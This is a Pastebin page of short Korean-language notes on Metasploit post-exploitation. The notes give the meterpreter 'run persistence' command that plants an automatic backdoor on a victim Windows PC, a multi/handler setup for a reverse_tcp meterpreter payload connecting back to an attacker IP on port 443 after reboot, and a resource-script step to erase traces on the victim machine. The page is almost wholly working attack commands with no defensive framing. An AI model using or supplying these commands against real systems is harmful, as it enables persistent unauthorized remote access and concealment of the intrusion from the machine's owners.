Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 자동 백도어
- #공격 성공 후 (권한 획득 후)
- #도움말
- run persistence -h
- #공격자의 시스템으로 접근
- run persisence -X -L c:\\ -i 10 -p 443 -r 192.168.182.151
- -X 자동 백도어
- -L c:\\ 악성코드가 심겨질 위치 (피해자)
- -i 10 인터벌
- -p 443 포트 (공격자)
- -r IP 공격자 IP (공격자)
- 상기 공격을 수행한 뒤 아래와 같이 handler를 오픈하여, 피해자 PC가 접속할 수 있도록 port를 열어 놓는다.
- #멀티핸들러
- use multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.182.151
- set lport 443
- exploit
- ((피해자 PC 재부팅 되면 공격자의 PC로 접속한다)
- #흔적 지우기
- resource /root/.msf4/logs/persistence/Y~~~~/xxxxx.rc
- 피해자 PC의 흔적을 모두 삭제한다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement